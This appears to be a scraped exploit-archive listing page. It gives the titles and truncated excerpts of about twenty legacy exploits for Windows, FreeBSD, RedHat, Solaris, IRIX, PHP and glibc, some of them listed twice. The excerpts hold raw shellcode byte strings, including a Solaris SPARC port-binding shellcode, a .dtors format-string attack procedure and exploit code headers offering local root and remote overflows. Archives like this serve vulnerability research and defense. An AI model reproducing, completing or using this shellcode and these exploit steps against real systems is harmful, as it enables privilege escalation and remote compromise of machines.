Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)

// source: https://www.securityfocus.com/bid/5927/info The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability BID 5408. A local user can use a WMCOPYDATA message to send arbitrary...

CodeBlue 5.1 - SMTP Response Buffer Overflow

CodeBlue 5.1 - SMTP Response Buffer Overflow // source: https://www.securityfocus.com/bid/5300/info CodeBlue is an Apache httpd log scanning utility that attempts to contact the administrators of hosts infected with worms. A buffer overflow vulnerability has been reported in CodeBlue. The conditi...

FreeBSD - '/usr/bin/top' Format String

/ freebsd x86 top exploit affected under top-3.5beta9 including this version 1. get the address of .dtors from /usr/bin/top using objdump , 'objdump -s -j .dtors /usr/bin/top' 2. divide it into four parts, and set it up into an environment variable like "XSEO=" 3. run top, then find "your parted...

another format string bug

There is a format string bug in 'pwc' ftp://ftp.media-com.com.pl/pub/other/pwc.tar.gz. This CGI script is used to change users password via www blah!. writelog call syslog function, which 'eats' ; characters and log it to system logs. But you can paste shellcode into buffers512 and syslog will ru...

RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation

!/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b". "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"...

RedHat 6.1 - man Local Overflow Local Privilege Escalation

RedHat 6.1 - man Local Overflow Local Privilege Escalation !/usr/bin/perl Redhat 6.1 man exploit - gives egid 15 Written just for fun - [email protected] $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"...

Seyon 2.1 rev. 4b i586-Linux (RedHat 4.0/5.1) - Local Overflow

!/usr/bin/perl c Copyright [email protected] / anno domani 2000 Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux Tested on: RedHat 4.0/5.1 Greets: scrippie, @HWA, grazer, mixter, pr0ix, s\ http://www.digit-labs.org/ || http://teleh0r.cjb.net/ $shellcode = "\xeb\x1f". / jmp 0x1f / "\x5e". ...

Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow

Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow /--oopz.c---//-------------r-3-m-0-t-3---------------\------------- TARGET : oops-1.4.6 one russi4n proxy-server CLASS : remote 0S : FreeBSD 4.0 - 2 AUTH0R : diman VEND0R : wanna payment for support. I'm not doing his job, yeh? DATE :...

gnome_segv - Local Buffer Overflow

gnomesegv - Local Buffer Overflow / gnomesegv local buffer overflow. Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / [email protected] 12/9/2000 This exploit was coded at overfiens in cali. Shouts to overfien and skeptik... h00t h00t. Bug found by skeptik. Tested on SuSE 6.4/2.2.14...

PHP 3.0.16/4.0.2 - Remote Format Overflow

/ PHP 3.0.16/4.0.2 remote format overflow exploit. Copyright c 2000 Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau [email protected] my regards to sheib and darkx All rights reserved Pascal Boucheraine's paper was enlightening THERE IS NO IMPLIED OR EXPRESS WARRANTY FOR THIS...

PHP 3.0.16/4.0.2 Remote Format Overflow Exploit

Exploit for linux platform in category remote exploits =============================================== PHP 3.0.16/4.0.2 Remote Format Overflow Exploit =============================================== / PHP 3.0.16/4.0.2 remote format overflow exploit. Copyright c 2000 Field Marshal Count August Ant...

Solaris sadmind Remote Buffer Overflow Exploit

Exploit for solaris platform in category remote exploits ============================================== Solaris sadmind Remote Buffer Overflow Exploit ============================================== /\ Super Solaris sadmin Exploit by optyx based on sadminsparc. and sadminx86.c by Cheez Whiz /...

GLIBC - binsu Local Privilege Escalation

GLIBC - binsu Local Privilege Escalation / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to...

GLIBC (via /bin/su) Local Root Exploit

Exploit for linux platform in category local exploits ====================================== GLIBC via /bin/su Local Root Exploit ====================================== / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of...

BFTPd - 'vsprintf()' Format Strings

/ Copyright c 2000 - Security.is The following material may be freely redistributed, provided that the code or the disclaimer have not been partly removed, altered or modified in any way. The material is the property of security.is. You are allowed to adopt the represented code in your programs,...

solaris/SPARC portbinding shellcode

solaris/SPARC portbinding shellcode. Shellcode exploit for solarissparc platform / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0, %l7 / "\xee\x23\xbf\xec" / st %l7, %sp - 20 / "\x82\x05\xe0\xd6" / add %l7, 214, %g1...

Qualcomm qpopper 3.03.0 b20 - Remote Buffer Overflow (1)

Qualcomm qpopper 3.03.0 b20 - Remote Buffer Overflow 1 // source: https://www.securityfocus.com/bid/830/info There is a buffer overflow vulnerability present in current 3.x versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the ho...

crond_exploit.txt

Subject: Crond Scooby Snacks for Everyone. To: [email protected] Paul Vixie loves us all so much it's overflowing. For your own private use, standard disclaimer and transfer of responsibility to that of the end user applies. Oh yeah, and I made it semi-self cleaning just because I love yo...

libtermcap_xterm_exploit.txt

Subject: libtermcap xterm exploit To: [email protected] / libtermcap xterm exploit by m0f0 1999 it works for xterm/nxterm Tested Slackware 3.5, 3.6 / include define BUFSIZE 5000 define POSRET 2000 define POSSEP 3000 define RETADDR 0xbfffefef define EGG "/tmp/eggtermcap" // shellcode char...

IRIX 5.3 - usrsbiniwsh Local Buffer Overflow Local Privilege Escalation

IRIX 5.3 - usrsbiniwsh Local Buffer Overflow Local Privilege Escalation / /usr/sbin/iwsh.c exploit by DCRH 27/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 Irix 5.x only compile as: cc iwsh.c / include include include include include define NUMADDRESSES 500 define BUFLENGTH 500 define...